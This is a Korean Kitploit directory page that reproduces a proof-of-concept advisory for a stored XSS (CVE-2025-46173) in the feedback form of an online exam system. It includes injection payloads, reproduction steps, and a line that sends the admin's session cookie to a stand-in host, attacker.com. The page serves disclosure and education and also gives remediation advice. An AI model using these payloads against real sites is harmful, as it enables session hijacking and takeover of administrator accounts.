Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-46173 — CVE-2025-46173용 PoC | Kitploit
도구/GitHubGitHub/pruthuraut/cve-2025-46173
Vulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & Education
GitHubpruthuraut/cve-2025-46173

CVE-2025-46173

CVE-2025-46173용 PoC

저장소 보기
1년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-46173 - 온라인 시험 마스터링 시스템 1.0의 저장형 크로스 사이트 스크립팅 (XSS)

📌 요약

CVE-2025-46173은 code-projects의 Online Exam Mastering System 1.0에서 발견된 저장형 크로스 사이트 스크립팅 (XSS) 취약점입니다. 이 취약점은 feedback.php 구성 요소에 존재하며, 이름 필드의 사용자 입력이 적절히 이스케이프되지 않아 악의적인 공격자가 임의의 JavaScript를 주입할 수 있습니다. 관리자가 이 피드백을 관리자 대시보드(dash.php)에서 조회할 때 페이로드가 관리자의 브라우저에서 실행되어 세션 하이재킹 및 잠재적인 권한 상승으로 이어집니다.


🧠 취약점 상세

  • 취약점 유형: 저장형 크로스 사이트 스크립팅 (XSS)
  • CVE-ID: CVE-2025-46173
  • 공급업체: code-projects
  • 제품: Online Exam Mastering System
  • 영향받는 버전: 1.0
  • 구성 요소: feedback.php, dash.php
  • 공격 벡터: 원격
  • 영향: 권한 상승, 세션 하이재킹

📷 개념 증명

1. 주입

사용자가 피드백 양식의 이름 필드에 다음 페이로드를 제출합니다:

root@kitploit:~
<script>alert(document.cookie)</script>

피드백 양식에 페이로드 입력

2. 트리거

관리자가 나중에 dash.php에서 제출된 피드백을 조회하면 페이로드가 실행됩니다:

관리자 XSS 트리거

3. 결과

document.cookie를 통해 관리자의 세션 쿠키가 노출되며, 이를 유출할 수 있습니다:

root@kitploit:~
<script>
  fetch("http://attacker.com/steal?cookie=" + document.cookie);
</script>

⚙️ 재현 단계

  1. code-projects에서 취약한 버전을 클론하거나 설정합니다.

  2. localhost/exam/feedback.php로 이동합니다.

  3. "이름" 필드에 다음을 입력합니다:

    root@kitploit:~
    <script>alert(document.cookie)</script>
    
  4. 양식을 제출합니다.

  5. 관리자로 로그인하고 dash.php?q=3으로 이동하여 피드백을 확인합니다.

  6. 스크립트가 관리자 컨텍스트에서 실행됩니다.


🔥 영향

성공적인 익스플로잇을 통해 원격 공격자는 다음을 수행할 수 있습니다:

  • 관리자 세션 쿠키 탈취
  • 관리자 사용자로 가장
  • 전체 관리자 액세스 권한 획득
  • 시험 데이터 수정 또는 삭제
  • 권한 상승

🔒 권장 수정 사항

  • HTML 특수 문자(예: &, <, >, ")를 이스케이프하여 사용자 입력을 정화하세요.
  • PHP의 htmlspecialchars()와 같은 강력한 정화 라이브러리 또는 프론트엔드 검증 + 백엔드 정화 조합을 사용하세요.
  • 콘텐츠 보안 정책(CSP)을 구현하세요.
  • DOM에 렌더링하기 전에 데이터를 인코딩하는 것을 고려하세요.

🔗 참고 자료

  • 블라인드 크로스 사이트 스크립팅 (Invicti)
  • Acunetix - Blind XSS 탐지
  • OWASP XSS 방지 치트 시트

👤 발견자

Pruthu Raut LinkedIn | TryHackMe Top 2% | GitHub


스크린샷은 교육 목적으로만 제공됩니다. 모든 테스트는 로컬 환경에서 수행되었습니다.

🎥 영상 PoC

데모 영상을 보려면 여기를 클릭하세요


⚠️ 면책 조항

이 정보는 교육 및 연구 목적으로만 제공됩니다. 소유하지 않거나 명시적 권한이 없는 시스템에서 이를 사용하지 마십시오.

도구 다운로드